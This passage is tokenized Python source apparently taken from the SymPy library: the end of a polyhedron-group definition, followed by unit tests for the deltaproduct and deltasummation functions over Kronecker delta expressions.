, <NUM_LIT:4> , <NUM_LIT:5> ] , [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:5> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:6> , <NUM_LIT:7> ] , [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:7> ] , [ <NUM_LIT:2> , <NUM_LIT:7> , <NUM_LIT:8> ] , [ <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:8> ] , [ <NUM_LIT:3> , <NUM_LIT:8> , <NUM_LIT:9> ] , <EOL> [ <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:9> ] , [ <NUM_LIT:4> , <NUM_LIT:9> , <NUM_LIT:10> ] , [ <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:10> ] , [ <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:10> ] , [ <NUM_LIT:1> , <NUM_LIT:5> , <NUM_LIT:6> ] , <EOL> [ <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT:11> ] , [ <NUM_LIT:7> , <NUM_LIT:8> , <NUM_LIT:11> ] , [ <NUM_LIT:8> , <NUM_LIT:9> , <NUM_LIT:11> ] , [ <NUM_LIT:9> , <NUM_LIT:10> , <NUM_LIT:11> ] , [ <NUM_LIT:6> , <NUM_LIT:10> , <NUM_LIT:11> ] ] <EOL> icosahedron = Polyhedron ( <EOL> range ( <NUM_LIT:12> ) , <EOL> icosahedron_faces , <EOL> _pgroup_of_double ( <EOL> dodecahedron , dodecahedron_faces , _dodeca_pgroup ) ) <EOL> return ( tetrahedron , cube , octahedron , dodecahedron , icosahedron , <EOL> tetrahedron_faces , cube_faces , octahedron_faces , <EOL> dodecahedron_faces , icosahedron_faces ) <EOL> ( tetrahedron , cube , octahedron , dodecahedron , icosahedron , <EOL> tetrahedron_faces , cube_faces , octahedron_faces , <EOL> dodecahedron_faces , icosahedron_faces ) = _pgroup_calcs ( ) </s>
<s> from sympy . concrete import Sum <EOL> from sympy . concrete . delta import deltaproduct as dp , deltasummation as ds <EOL> from sympy . core import Eq , S , symbols , oo <EOL> from sympy . functions import KroneckerDelta as KD , Piecewise , piecewise_fold <EOL> from sympy . logic import And <EOL> i , j , k , l , m = symbols ( "<STR_LIT>" , integer = True , finite = True ) <EOL> x , y = symbols ( "<STR_LIT>" , commutative = False ) <EOL> def test_deltaproduct_trivial ( ) : <EOL> assert dp ( x , ( j , <NUM_LIT:1> , <NUM_LIT:0> ) ) == <NUM_LIT:1> <EOL> assert dp ( x , ( j , <NUM_LIT:1> , <NUM_LIT:3> ) ) == x ** <NUM_LIT:3> <EOL> assert dp ( x + y , ( j , <NUM_LIT:1> , <NUM_LIT:3> ) ) == ( x + y ) ** <NUM_LIT:3> <EOL> assert dp ( x * y , ( j , <NUM_LIT:1> , <NUM_LIT:3> ) ) == ( x * y ) ** <NUM_LIT:3> <EOL> assert dp ( KD ( i , j ) , ( k , <NUM_LIT:1> , <NUM_LIT:3> ) ) == KD ( i , j ) <EOL> assert dp ( x * KD ( i , j ) , ( k , <NUM_LIT:1> , <NUM_LIT:3> ) ) == x ** <NUM_LIT:3> * KD ( i , j ) <EOL> assert dp ( x * y * KD ( i , j ) , ( k , <NUM_LIT:1> , <NUM_LIT:3> ) ) == ( x * y ) ** <NUM_LIT:3> * KD ( i , j ) <EOL> def test_deltaproduct_basic ( ) : <EOL> assert dp ( KD ( i , j ) , ( j , <NUM_LIT:1> , <NUM_LIT:3> ) ) == <NUM_LIT:0> <EOL> assert dp ( KD ( i , j ) , ( j , <NUM_LIT:1> , <NUM_LIT:1> ) ) == KD ( i , <NUM_LIT:1> ) <EOL> assert dp ( KD ( i , j ) , ( j , <NUM_LIT:2> , <NUM_LIT:2> ) ) == KD ( i , <NUM_LIT:2> ) <EOL> assert dp ( KD ( i , j ) , ( j , <NUM_LIT:3> , <NUM_LIT:3> ) ) == KD ( i , <NUM_LIT:3> ) <EOL> assert dp ( KD ( i , j ) , ( j , <NUM_LIT:1> , k ) ) == KD ( i , <NUM_LIT:1> ) * KD ( k , <NUM_LIT:1> ) + KD ( k , <NUM_LIT:0> ) <EOL> assert dp ( KD ( i , j ) , ( j , k , <NUM_LIT:3> ) ) == KD ( i , <NUM_LIT:3> ) * KD ( k , <NUM_LIT:3> ) + KD ( k , <NUM_LIT:4> ) <EOL> assert dp ( KD ( i , j ) , ( j , k , l ) ) == KD ( i , l ) * KD ( k , l ) + KD ( k , l + <NUM_LIT:1> ) <EOL> def test_deltaproduct_mul_x_kd ( ) : <EOL> assert dp ( x * KD ( i , j ) , ( j , <NUM_LIT:1> , <NUM_LIT:3> ) ) == <NUM_LIT:0> <EOL> assert dp ( x * KD ( i , j ) , ( j , <NUM_LIT:1> , <NUM_LIT:1> ) ) == x * KD ( i , <NUM_LIT:1> ) <EOL> assert dp ( x * KD ( i , j ) , ( j , <NUM_LIT:2> , <NUM_LIT:2> ) ) == x * KD ( i , <NUM_LIT:2> ) <EOL> assert dp ( x * KD ( i , j ) , ( j , <NUM_LIT:3> , <NUM_LIT:3> ) ) == x * KD ( i , <NUM_LIT:3> ) <EOL> assert dp ( x * KD ( i , j ) , ( j , <NUM_LIT:1> , k ) ) == x * KD ( i , <NUM_LIT:1> ) * KD ( k , <NUM_LIT:1> ) + KD ( k , <NUM_LIT:0> ) <EOL> assert dp ( x * KD ( i , j ) , ( j , k , <NUM_LIT:3> ) ) == x * KD ( i , <NUM_LIT:3> ) * KD ( k , <NUM_LIT:3> ) + KD ( k , <NUM_LIT:4> ) <EOL> assert dp ( x * KD ( i , j ) , ( j , k , l ) ) == x * KD ( i , l ) * KD ( k , l ) + KD ( k , l + <NUM_LIT:1> ) <EOL> def test_deltaproduct_mul_add_x_y_kd ( ) : <EOL> assert dp ( ( x + y ) * KD ( i , j ) , ( j , <NUM_LIT:1> , <NUM_LIT:3> ) ) == <NUM_LIT:0> <EOL> assert dp ( ( x + y ) * KD ( i , j ) , ( j , <NUM_LIT:1> , <NUM_LIT:1> ) ) == ( x + y ) * KD ( i , <NUM_LIT:1> ) <EOL> assert dp ( ( x + y ) * KD ( i , j ) , ( j , <NUM_LIT:2> , <NUM_LIT:2> ) ) == ( x + y ) * KD ( i , <NUM_LIT:2> ) <EOL> assert dp ( ( x + y ) * KD ( i , j ) , ( j , <NUM_LIT:3> , <NUM_LIT:3> ) ) == ( x + y ) * KD ( i , <NUM_LIT:3> ) <EOL> assert dp ( ( x + y ) * KD ( i , j ) , ( j , <NUM_LIT:1> , k ) ) == ( x + y ) * KD ( i , <NUM_LIT:1> ) * KD ( k , <NUM_LIT:1> ) + KD ( k , <NUM_LIT:0> ) <EOL> assert dp ( ( x + y ) * KD ( i , j ) , ( j , k , <NUM_LIT:3> ) ) == ( x + y ) * KD ( i , <NUM_LIT:3> ) * KD ( k , <NUM_LIT:3> ) + KD ( k , <NUM_LIT:4> ) <EOL> assert dp ( ( x + y ) * KD ( i , j ) , ( j , k , l ) ) == ( x + y ) * KD ( i , l ) * KD ( k , l ) + KD ( k , l + <NUM_LIT:1> ) <EOL> def test_deltaproduct_add_kd_kd ( ) : <EOL> assert dp ( KD ( i , k ) + KD ( j , k ) , ( k , <NUM_LIT:1> , <NUM_LIT:3> ) ) == <NUM_LIT:0> <EOL> assert dp ( KD ( i , k ) + KD ( j , k ) , ( k , <NUM_LIT:1> , <NUM_LIT:1> ) ) == KD ( i , <NUM_LIT:1> ) + KD ( j , <NUM_LIT:1> ) <EOL> assert dp ( KD ( i , k ) + KD ( j , k ) , ( k , <NUM_LIT:2> , <NUM_LIT:2> ) ) == KD ( i , <NUM_LIT:2> ) + KD ( j , <NUM_LIT:2> ) <EOL> assert dp ( KD ( i , k ) + KD ( j , k ) , ( k , <NUM_LIT:3> , <NUM_LIT:3> ) ) == KD ( i , <NUM_LIT:3> ) + KD ( j , <NUM_LIT:3> ) <EOL> assert dp ( KD ( i , k ) + KD ( j , k ) , ( k , <NUM_LIT:1> , l ) ) == KD ( l , <NUM_LIT:0> ) + KD ( i , <NUM_LIT:1> ) * KD ( l , <NUM_LIT:1> ) + KD ( j , <NUM_LIT:1> ) * KD ( l , <NUM_LIT:1> ) + KD ( i , <NUM_LIT:1> ) * KD ( j , <NUM_LIT:2> ) * KD ( l , <NUM_LIT:2> ) + KD ( j , <NUM_LIT:1> ) * KD ( i , <NUM_LIT:2> ) * KD ( l , <NUM_LIT:2> ) <EOL> assert dp ( KD ( i , k ) + KD ( j , k ) , ( k , l , <NUM_LIT:3> ) ) == KD ( l , <NUM_LIT:4> ) + KD ( i , <NUM_LIT:3> ) * KD ( l , <NUM_LIT:3> ) + KD ( j , <NUM_LIT:3> ) * KD ( l , <NUM_LIT:3> ) + KD ( i , <NUM_LIT:2> ) * KD ( j , <NUM_LIT:3> ) * KD ( l , <NUM_LIT:2> ) + KD ( i , <NUM_LIT:3> ) * KD ( j , <NUM_LIT:2> ) * KD ( l , <NUM_LIT:2> ) <EOL> assert dp ( KD ( i , k ) + KD ( j , k ) , ( k , l , m ) ) == KD ( l , m + <NUM_LIT:1> ) + KD ( i , m ) * KD ( l , m ) + KD ( j , m ) * KD ( l , m ) + KD ( i , m ) * KD ( j , m - <NUM_LIT:1> ) * KD ( l , m - <NUM_LIT:1> ) + KD ( i , m - <NUM_LIT:1> ) * KD ( j , m ) * KD ( l , m - <NUM_LIT:1> ) <EOL> def test_deltaproduct_mul_x_add_kd_kd ( ) : <EOL> assert dp ( x * ( KD ( i , k ) + KD ( j , k ) ) , ( k , <NUM_LIT:1> , <NUM_LIT:3> ) ) == <NUM_LIT:0> <EOL> assert dp ( x * ( KD ( i , k ) + KD ( j , k ) ) , ( k , <NUM_LIT:1> , <NUM_LIT:1> ) ) == x * ( KD ( i , <NUM_LIT:1> ) + KD ( j , <NUM_LIT:1> ) ) <EOL> assert dp ( x * ( KD ( i , k ) + KD ( j , k ) ) , ( k , <NUM_LIT:2> , <NUM_LIT:2> ) ) == x * ( KD ( i , <NUM_LIT:2> ) + KD ( j , <NUM_LIT:2> ) ) <EOL> assert dp ( x * ( KD ( i , k ) + KD ( j , k ) ) , ( k , <NUM_LIT:3> , <NUM_LIT:3> ) ) == x * ( KD ( i , <NUM_LIT:3> ) + KD ( j , <NUM_LIT:3> ) ) <EOL> assert dp ( x * ( KD ( i , k ) + KD ( j , k ) ) , ( k , <NUM_LIT:1> , l ) ) == KD ( l , <NUM_LIT:0> ) + x * KD ( i , <NUM_LIT:1> ) * KD ( l , <NUM_LIT:1> ) + x * KD ( j , <NUM_LIT:1> ) * KD ( l , <NUM_LIT:1> ) + x ** <NUM_LIT:2> * KD ( i , <NUM_LIT:1> ) * KD ( j , <NUM_LIT:2> ) * KD ( l , <NUM_LIT:2> ) + x ** <NUM_LIT:2> * KD ( j , <NUM_LIT:1> ) * KD ( i , <NUM_LIT:2> ) * KD ( l , <NUM_LIT:2> ) <EOL> assert dp ( x * ( KD ( i , k ) + KD ( j , k ) ) , ( k , l , <NUM_LIT:3> ) ) == KD ( l , <NUM_LIT:4> ) + x * KD ( i , <NUM_LIT:3> ) * KD ( l , <NUM_LIT:3> ) + x * KD ( j , <NUM_LIT:3> ) * KD ( l , <NUM_LIT:3> ) + x ** <NUM_LIT:2> * KD ( i , <NUM_LIT:2> ) * KD ( j , <NUM_LIT:3> ) * KD ( l , <NUM_LIT:2> ) + x ** <NUM_LIT:2> * KD ( i , <NUM_LIT:3> ) * KD ( j , <NUM_LIT:2> ) * KD ( l , <NUM_LIT:2> ) <EOL> assert dp ( x * ( KD ( i , k ) + KD ( j , k ) ) , ( k , l , m ) ) == KD ( l , m + <NUM_LIT:1> ) + x * KD ( i , m ) * KD ( l , m ) + x * KD ( j , m ) * KD ( l , m ) + x ** <NUM_LIT:2> * KD ( i , m - <NUM_LIT:1> ) * KD ( j , m ) * KD ( l , m - <NUM_LIT:1> ) + x ** <NUM_LIT:2> * KD ( i , m ) * KD ( j , m - <NUM_LIT:1> ) * KD ( l , m - <NUM_LIT:1> ) <EOL> def test_deltaproduct_mul_add_x_y_add_kd_kd ( ) : <EOL> assert dp ( ( x + y ) * ( KD ( i , k ) + KD ( j , k ) ) , ( k , <NUM_LIT:1> , <NUM_LIT:3> ) ) == <NUM_LIT:0> <EOL> assert dp ( ( x + y ) * ( KD ( i , k ) + KD ( j , k ) ) , ( k , <NUM_LIT:1> , <NUM_LIT:1> ) ) == ( x + y ) * ( KD ( i , <NUM_LIT:1> ) + KD ( j , <NUM_LIT:1> ) ) <EOL> assert dp ( ( x + y ) * ( KD ( i , k ) + KD ( j , k ) ) , ( k , <NUM_LIT:2> , <NUM_LIT:2> ) ) == ( x + y ) * ( KD ( i , <NUM_LIT:2> ) + KD ( j , <NUM_LIT:2> ) ) <EOL> assert dp ( ( x + y ) * ( KD ( i , k ) + KD ( j , k ) ) , ( k , <NUM_LIT:3> , <NUM_LIT:3> ) ) == ( x + y ) * ( KD ( i , <NUM_LIT:3> ) + KD ( j , <NUM_LIT:3> ) ) <EOL> assert dp ( ( x + y ) * ( KD ( i , k ) + KD ( j , k ) ) , ( k , <NUM_LIT:1> , l ) ) == KD ( l , <NUM_LIT:0> ) + ( x + y ) * KD ( i , <NUM_LIT:1> ) * KD ( l , <NUM_LIT:1> ) + ( x + y ) * KD ( j , <NUM_LIT:1> ) * KD ( l , <NUM_LIT:1> ) + ( x + y ) ** <NUM_LIT:2> * KD ( i , <NUM_LIT:1> ) * KD ( j , <NUM_LIT:2> ) * KD ( l , <NUM_LIT:2> ) + ( x + y ) ** <NUM_LIT:2> * KD ( j , <NUM_LIT:1> ) * KD ( i , <NUM_LIT:2> ) * KD ( l , <NUM_LIT:2> ) <EOL> assert dp ( ( x + y ) * ( KD ( i , k ) + KD ( j , k ) ) , ( k , l , <NUM_LIT:3> ) ) == KD ( l , <NUM_LIT:4> ) + ( x + y ) * KD ( i , <NUM_LIT:3> ) * KD ( l , <NUM_LIT:3> ) + ( x + y ) * KD ( j , <NUM_LIT:3> ) * KD ( l , <NUM_LIT:3> ) + ( x + y ) ** <NUM_LIT:2> * KD ( i , <NUM_LIT:2> ) * KD ( j , <NUM_LIT:3> ) * KD ( l , <NUM_LIT:2> ) + ( x + y ) ** <NUM_LIT:2> * KD ( i , <NUM_LIT:3> ) * KD ( j , <NUM_LIT:2> ) * KD ( l , <NUM_LIT:2> ) <EOL> assert dp ( ( x + y ) * ( KD ( i , k ) + KD ( j , k ) ) , ( k , l , m ) ) == KD ( l , m + <NUM_LIT:1> ) + ( x + y ) * KD ( i , m ) * KD ( l , m ) + ( x + y ) * KD ( j , m ) * KD ( l , m ) + ( x + y ) ** <NUM_LIT:2> * KD ( i , m - <NUM_LIT:1> ) * KD ( j , m ) * KD ( l , m - <NUM_LIT:1> ) + ( x + y ) ** <NUM_LIT:2> * KD ( i , m ) * KD ( j , m - <NUM_LIT:1> ) * KD ( l , m - <NUM_LIT:1> ) <EOL> def test_deltaproduct_add_mul_x_y_mul_x_kd ( ) : <EOL> assert dp ( x * y + x * KD ( i , j ) , ( j , <NUM_LIT:1> , <NUM_LIT:3> ) ) == ( x * y ) ** <NUM_LIT:3> + x * ( x * y ) ** <NUM_LIT:2> * KD ( i , <NUM_LIT:1> ) + ( x * y ) * x * ( x * y ) * KD ( i , <NUM_LIT:2> ) + ( x * y ) ** <NUM_LIT:2> * x * KD ( i , <NUM_LIT:3> ) <EOL> assert dp ( x * y + x * KD ( i , j ) , ( j , <NUM_LIT:1> , <NUM_LIT:1> ) ) == x * y + x * KD ( i , <NUM_LIT:1> ) <EOL> assert dp ( x * y + x * KD ( i , j ) , ( j , <NUM_LIT:2> , <NUM_LIT:2> ) ) == x * y + x * KD ( i , <NUM_LIT:2> ) <EOL> assert dp ( x * y + x * KD ( i , j ) , ( j , <NUM_LIT:3> , <NUM_LIT:3> ) ) == x * y + x * KD ( i , <NUM_LIT:3> ) <EOL> assert dp ( x * y + x * KD ( i , j ) , ( j , <NUM_LIT:1> , k ) ) == ( x * y ) ** k + Piecewise ( <EOL> ( ( x * y ) ** ( i - <NUM_LIT:1> ) * x * ( x * y ) ** ( k - i ) , And ( S ( <NUM_LIT:1> ) <= i , i <= k ) ) , <EOL> ( <NUM_LIT:0> , True ) <EOL> ) <EOL> assert dp ( x * y + x * KD ( i , j ) , ( j , k , <NUM_LIT:3> ) ) == ( x * y ) ** ( - k + <NUM_LIT:4> ) + Piecewise ( <EOL> ( ( x * y ) ** ( i - k ) * x * ( x * y ) ** ( <NUM_LIT:3> - i ) , And ( k <= i , i <= <NUM_LIT:3> ) ) , <EOL> ( <NUM_LIT:0> , True ) <EOL> ) <EOL> assert dp ( x * y + x * KD ( i , j ) , ( j , k , l ) ) == ( x * y ) ** ( - k + l + <NUM_LIT:1> ) + Piecewise ( <EOL> ( ( x * y ) ** ( i - k ) * x * ( x * y ) ** ( l - i ) , And ( k <= i , i <= l ) ) , <EOL> ( <NUM_LIT:0> , True ) <EOL> ) <EOL> def test_deltaproduct_mul_x_add_y_kd ( ) : <EOL> assert dp ( x * ( y + KD ( i , j ) ) , ( j , <NUM_LIT:1> , <NUM_LIT:3> ) ) == ( x * y ) ** <NUM_LIT:3> + x * ( x * y ) ** <NUM_LIT:2> * KD ( i , <NUM_LIT:1> ) + ( x * y ) * x * ( x * y ) * KD ( i , <NUM_LIT:2> ) + ( x * y ) ** <NUM_LIT:2> * x * KD ( i , <NUM_LIT:3> ) <EOL> assert dp ( x * ( y + KD ( i , j ) ) , ( j , <NUM_LIT:1> , <NUM_LIT:1> ) ) == x * ( y + KD ( i , <NUM_LIT:1> ) ) <EOL> assert dp ( x * ( y + KD ( i , j ) ) , ( j , <NUM_LIT:2> , <NUM_LIT:2> ) ) == x * ( y + KD ( i , <NUM_LIT:2> ) ) <EOL> assert dp ( x * ( y + KD ( i , j ) ) , ( j , <NUM_LIT:3> , <NUM_LIT:3> ) ) == x * ( y + KD ( i , <NUM_LIT:3> ) ) <EOL> assert dp ( x * ( y + KD ( i , j ) ) , ( j , <NUM_LIT:1> , k ) ) == ( x * y ) ** k + Piecewise ( <EOL> ( ( x * y ) ** ( i - <NUM_LIT:1> ) * x * ( x * y ) ** ( k - i ) , And ( S ( <NUM_LIT:1> ) <= i , i <= k ) ) , <EOL> ( <NUM_LIT:0> , True ) <EOL> ) <EOL> assert dp ( x * ( y + KD ( i , j ) ) , ( j , k , <NUM_LIT:3> ) ) == ( x * y ) ** ( - k + <NUM_LIT:4> ) + Piecewise ( <EOL> ( ( x * y ) ** ( i - k ) * x * ( x * y ) ** ( <NUM_LIT:3> - i ) , And ( k <= i , i <= <NUM_LIT:3> ) ) , <EOL> ( <NUM_LIT:0> , True ) <EOL> ) <EOL> assert dp ( x * ( y + KD ( i , j ) ) , ( j , k , l ) ) == ( x * y ) ** ( - k + l + <NUM_LIT:1> ) + Piecewise ( <EOL> ( ( x * y ) ** ( i - k ) * x * ( x * y ) ** ( l - i ) , And ( k <= i , i <= l ) ) , <EOL> ( <NUM_LIT:0> , True ) <EOL> ) <EOL> def test_deltaproduct_mul_x_add_y_twokd ( ) : <EOL> assert dp ( x * ( y + <NUM_LIT:2> * KD ( i , j ) ) , ( j , <NUM_LIT:1> , <NUM_LIT:3> ) ) == ( x * y ) ** <NUM_LIT:3> + <NUM_LIT:2> * x * ( x * y ) ** <NUM_LIT:2> * KD ( i , <NUM_LIT:1> ) + <NUM_LIT:2> * x * y * x * x * y * KD ( i , <NUM_LIT:2> ) + <NUM_LIT:2> * ( x * y ) ** <NUM_LIT:2> * x * KD ( i , <NUM_LIT:3> ) <EOL> assert dp ( x * ( y + <NUM_LIT:2> * KD ( i , j ) ) , ( j , <NUM_LIT:1> , <NUM_LIT:1> ) ) == x * ( y + <NUM_LIT:2> * KD ( i , <NUM_LIT:1> ) ) <EOL> assert dp ( x * ( y + <NUM_LIT:2> * KD ( i , j ) ) , ( j , <NUM_LIT:2> , <NUM_LIT:2> ) ) == x * ( y + <NUM_LIT:2> * KD ( i , <NUM_LIT:2> ) ) <EOL> assert dp ( x * ( y + <NUM_LIT:2> * KD ( i , j ) ) , ( j , <NUM_LIT:3> , <NUM_LIT:3> ) ) == x * ( y + <NUM_LIT:2> * KD ( i , <NUM_LIT:3> ) ) <EOL> assert dp ( x * ( y + <NUM_LIT:2> * KD ( i , j ) ) , ( j , <NUM_LIT:1> , k ) ) == ( x * y ) ** k + Piecewise ( <EOL> ( <NUM_LIT:2> * ( x * y ) ** ( i - <NUM_LIT:1> ) * x * ( x * y ) ** ( k - i ) , And ( S ( <NUM_LIT:1> ) <= i , i <= k ) ) , <EOL> ( <NUM_LIT:0> , True ) <EOL> ) <EOL> assert dp ( x * ( y + <NUM_LIT:2> * KD ( i , j ) ) , ( j , k , <NUM_LIT:3> ) ) == ( x * y ) ** ( - k + <NUM_LIT:4> ) + Piecewise ( <EOL> ( <NUM_LIT:2> * ( x * y ) ** ( i - k ) * x * ( x * y ) ** ( <NUM_LIT:3> - i ) , And ( k <= i , i <= <NUM_LIT:3> ) ) , <EOL> ( <NUM_LIT:0> , True ) <EOL> ) <EOL> assert dp ( x * ( y + <NUM_LIT:2> * KD ( i , j ) ) , ( j , k , l ) ) == ( x * y ) ** ( - k + l + <NUM_LIT:1> ) + Piecewise ( <EOL> ( <NUM_LIT:2> * ( x * y ) ** ( i - k ) * x * ( x * y ) ** ( l - i ) , And ( k <= i , i <= l ) ) , <EOL> ( <NUM_LIT:0> , True ) <EOL> ) <EOL> def test_deltaproduct_mul_add_x_y_add_y_kd ( ) : <EOL> assert dp ( ( x + y ) * ( y + KD ( i , j ) ) , ( j , <NUM_LIT:1> , <NUM_LIT:3> ) ) == ( ( x + y ) * y ) ** <NUM_LIT:3> + ( x + y ) * ( ( x + y ) * y ) ** <NUM_LIT:2> * KD ( i , <NUM_LIT:1> ) + ( x + y ) * y * ( x + y ) ** <NUM_LIT:2> * y * KD ( i , <NUM_LIT:2> ) + ( ( x + y ) * y ) ** <NUM_LIT:2> * ( x + y ) * KD ( i , <NUM_LIT:3> ) <EOL> assert dp ( ( x + y ) * ( y + KD ( i , j ) ) , ( j , <NUM_LIT:1> , <NUM_LIT:1> ) ) == ( x + y ) * ( y + KD ( i , <NUM_LIT:1> ) ) <EOL> assert dp ( ( x + y ) * ( y + KD ( i , j ) ) , ( j , <NUM_LIT:2> , <NUM_LIT:2> ) ) == ( x + y ) * ( y + KD ( i , <NUM_LIT:2> ) ) <EOL> assert dp ( ( x + y ) * ( y + KD ( i , j ) ) , ( j , <NUM_LIT:3> , <NUM_LIT:3> ) ) == ( x + y ) * ( y + KD ( i , <NUM_LIT:3> ) ) <EOL> assert dp ( ( x + y ) * ( y + KD ( i , j ) ) , ( j , <NUM_LIT:1> , k ) ) == ( ( x + y ) * y ) ** k + Piecewise ( <EOL> ( ( ( x + y ) * y ) ** ( i - <NUM_LIT:1> ) * ( x + y ) * ( ( x + y ) * y ) ** ( k - i ) , <EOL> And ( S ( <NUM_LIT:1> ) <= i , i <= k ) ) , <EOL> ( <NUM_LIT:0> , True ) <EOL> ) <EOL> assert dp ( ( x + y ) * ( y + KD ( i , j ) ) , ( j , k , <NUM_LIT:3> ) ) == ( ( x + y ) * y ) ** ( - k + <NUM_LIT:4> ) + Piecewise ( <EOL> ( ( ( x + y ) * y ) ** ( i - k ) * ( x + y ) * ( ( x + y ) * y ) ** ( <NUM_LIT:3> - i ) , <EOL> And ( k <= i , i <= <NUM_LIT:3> ) ) , <EOL> ( <NUM_LIT:0> , True ) <EOL> ) <EOL> assert dp ( ( x + y ) * ( y + KD ( i , j ) ) , ( j , k , l ) ) == ( ( x + y ) * y ) ** ( - k + l + <NUM_LIT:1> ) + Piecewise ( <EOL> ( ( ( x + y ) * y ) ** ( i - k ) * ( x + y ) * ( ( x + y ) * y ) ** ( l - i ) , <EOL> And ( k <= i , i <= l ) ) , <EOL> ( <NUM_LIT:0> , True ) <EOL> ) <EOL> def test_deltaproduct_mul_add_x_kd_add_y_kd ( ) : <EOL> assert dp ( ( x + KD ( i , k ) ) * ( y + KD ( i , j ) ) , ( j , <NUM_LIT:1> , <NUM_LIT:3> ) ) == KD ( i , <NUM_LIT:1> ) * ( KD ( i , k ) + x ) * ( ( KD ( i , k ) + x ) * y ) ** <NUM_LIT:2> + KD ( i , <NUM_LIT:2> ) * ( KD ( i , k ) + x ) * y * ( KD ( i , k ) + x ) ** <NUM_LIT:2> * y + KD ( i , <NUM_LIT:3> ) * ( ( KD ( i , k ) + x ) * y ) ** <NUM_LIT:2> * ( KD ( i , k ) + x ) + ( ( KD ( i , k ) + x ) * y ) ** <NUM_LIT:3> <EOL> assert dp ( ( x + KD ( i , k ) ) * ( y + KD ( i , j ) ) , ( j , <NUM_LIT:1> , <NUM_LIT:1> ) ) == ( x + KD ( i , k ) ) * ( y + KD ( i , <NUM_LIT:1> ) ) <EOL> assert dp ( ( x + KD ( i , k ) ) * ( y + KD ( i , j ) ) , ( j , <NUM_LIT:2> , <NUM_LIT:2> ) ) == ( x + KD ( i , k ) ) * ( y + KD ( i , <NUM_LIT:2> ) ) <EOL> assert dp ( ( x + KD ( i , k ) ) * ( y + KD ( i , j ) ) , ( j , <NUM_LIT:3> , <NUM_LIT:3> ) ) == ( x + KD ( i , k ) ) * ( y + KD ( i , <NUM_LIT:3> ) ) <EOL> assert dp ( ( x + KD ( i , k ) ) * ( y + KD ( i , j ) ) , ( j , <NUM_LIT:1> , k ) ) == ( ( x + KD ( i , k ) ) * y ) ** k + Piecewise ( <EOL> ( ( ( x + KD ( i , k ) ) * y ) ** ( i - <NUM_LIT:1> ) * ( x + KD ( i , k ) ) * <EOL> ( ( x + KD ( i , k ) ) * y ) ** ( - i + k ) , And ( S ( <NUM_LIT:1> ) <= i , i <= k ) ) , <EOL> ( <NUM_LIT:0> , True ) <EOL> ) <EOL> assert dp ( ( x + KD ( i , k ) ) * ( y + KD ( i , j ) ) , ( j , k , <NUM_LIT:3> ) ) == ( ( x + KD ( i , k ) ) * y ) ** ( <NUM_LIT:4> - k ) + Piecewise ( <EOL> ( ( ( x + KD ( i , k ) ) * y ) ** ( i - k ) * ( x + KD ( i , k ) ) * <EOL> ( ( x + KD ( i , k ) ) * y ) ** ( - i + <NUM_LIT:3> ) , And ( k <= i , i <= <NUM_LIT:3> ) ) , <EOL> ( <NUM_LIT:0> , True ) <EOL> ) <EOL> assert dp ( ( x + KD ( i , k ) ) * ( y + KD ( i , j ) ) , ( j , k , l ) ) == ( ( x + KD ( i , k ) ) * y ) ** ( - k + l + <NUM_LIT:1> ) + Piecewise ( <EOL> ( ( ( x + KD ( i , k ) ) * y ) ** ( i - k ) * ( x + KD ( i , k ) ) * <EOL> ( ( x + KD ( i , k ) ) * y ) ** ( - i + l ) , And ( k <= i , i <= l ) ) , <EOL> ( <NUM_LIT:0> , True ) <EOL> ) <EOL> def test_deltasummation_trivial ( ) : <EOL> assert ds ( x , ( j , <NUM_LIT:1> , <NUM_LIT:0> ) ) == <NUM_LIT:0> <EOL> assert ds ( x , ( j , <NUM_LIT:1> , <NUM_LIT:3> ) ) == <NUM_LIT:3> * x <EOL> assert ds ( x + y , ( j , <NUM_LIT:1> , <NUM_LIT:3> ) ) == <NUM_LIT:3> * ( x + y ) <EOL> assert ds ( x * y , ( j , <NUM_LIT:1> , <NUM_LIT:3> ) ) == <NUM_LIT:3> * x * y <EOL> assert ds ( KD ( i , j ) , ( k , <NUM_LIT:1> , <NUM_LIT:3> ) ) == <NUM_LIT:3> * KD ( i , j ) <EOL> assert ds ( x * KD ( i , j ) , ( k , <NUM_LIT:1> , <NUM_LIT:3> ) ) == <NUM_LIT:3> * x * KD ( i , j ) <EOL> assert ds ( x * y * KD ( i , j ) , ( k , <NUM_LIT:1> , <NUM_LIT:3> ) ) == <NUM_LIT:3> * x * y * KD ( i , j ) <EOL> def test_deltasummation_basic_numerical ( ) : <EOL> n = symbols ( '<STR_LIT:n>' , integer = True , nonzero = True ) <EOL> assert ds ( KD ( n , <NUM_LIT:0> ) , ( n , <NUM_LIT:1> , <NUM_LIT:3> ) ) == <NUM_LIT:0> <EOL> assert ds ( KD ( i ** <NUM_LIT:2> , j ** <NUM_LIT:2> ) , ( j , - oo , oo ) ) == Sum ( KD ( i ** <NUM_LIT:2> , j ** <NUM_LIT:2> ) , ( j , - oo , oo ) ) <EOL> assert Piecewise ( ( KD ( i , k ) , And ( S ( <NUM_LIT:1> ) <= i , i <= <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) == ds ( KD ( i , j ) * KD ( j , k ) , ( j , <NUM_LIT:1> , <NUM_LIT:3> ) ) == ds ( KD ( j , k ) * KD ( i , j ) , ( j , <NUM_LIT:1> , <NUM_LIT:3> ) ) <EOL> assert ds ( KD ( i , k ) , ( k , - oo , oo ) ) == <NUM_LIT:1> <EOL> assert ds ( KD ( i , k ) , ( k , <NUM_LIT:0> , oo ) ) == Piecewise ( ( <NUM_LIT:1> , S ( <NUM_LIT:0> ) <= i ) , ( <NUM_LIT:0> , True ) ) <EOL> assert ds ( KD ( i , k ) , ( k , <NUM_LIT:1> , <NUM_LIT:3> ) ) == Piecewise ( ( <NUM_LIT:1> , And ( S ( <NUM_LIT:1> ) <= i , i <= <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) <EOL> assert ds ( k * KD ( i , j ) * KD ( j , k ) , ( k , - oo , oo ) ) == j * KD ( i , j ) <EOL> assert ds ( j * KD ( i , j ) , ( j , - oo , oo ) ) == i <EOL> assert ds ( i * KD ( i , j ) , ( i , - oo , oo ) ) == j <EOL> assert ds ( x , ( i , <NUM_LIT:1> , <NUM_LIT:3> ) ) == <NUM_LIT:3> * x <EOL> assert ds ( ( 